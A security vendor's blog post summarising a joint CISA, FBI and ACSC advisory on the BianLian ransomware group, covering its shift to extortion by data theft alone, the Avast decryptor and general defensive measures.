BianLian Ransomware Shifting Focus to Pure Data Extortion

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI) and Australian Cyber Security Centre (ACSC) issued a joint cybersecurity advisory on BianLian ransomware, which has been targeting various critical infrastructure sectors in the United States and Australia since June 2022. Here’s what you need to know.

Who is BianLian Ransomware Group?

The BianLian ransomware group is a ransomware developer, deployer and data extortion cybercriminal group, according to CISA. The group uses remote desktop protocol (RDP) to gain access to their targets’ systems, then employs open source tools for discovery and credential harvesting. Once the group has found the information it’s looking for, it exfiltrates the data via file transfer protocol (FTP), Rclone or Mega. The group then threatens to release the data if a ransom isn’t paid.

BianLian ransomware group has also been known to use a double-extortion model, which encrypts the victims’ systems following exfiltration of the data; however, the group shifted focus in January 2023 to solely exfiltration-based extortion.

Is there a BianLian ransomware decryptor available?

Avast, a digital security and privacy company, released a free decryptor in January 2023 to help victims recover locked files encrypted by BianLian ransomware. It’s important to note that the decryption tool can only address known variants of the BianLian ransomware. That means if threat actors are using a new version of the malware, the decryptor won’t be able to help (at least for now).

It is unclear if the threat group abandoned the double-extortion encryption tactic because of Avast’s decryptor or if they just do not need that part of the attack chain to extort victims into paying ransoms.

What is Nuspire doing?

Nuspire actively threat hunts for indications of compromise (IoCs) within client environments. In this video, you can learn more about some of the threat hunting methodologies we use and the IoCs we look out for.

What should I do?

Although the BianLian ransomware group has seemingly abandoned data encryption techniques, other groups continue to use this tactic. Given the significant damage data encryption and ransomware can create, it’s important for critical infrastructure organizations and small- and medium-sized businesses to implement robust security measures. These include:

  • Implementing precautionary measures to prevent and detect ransomware, including using anti-ransomware or anti-malware programs.
  • Keeping software up to date, ensuring that vital security patches are installed.
  • Establishing regular backups of your files to a remote server, and implementing organizational firewalls, proxies, web filtering and mail filtering.

Have you registered for our next event?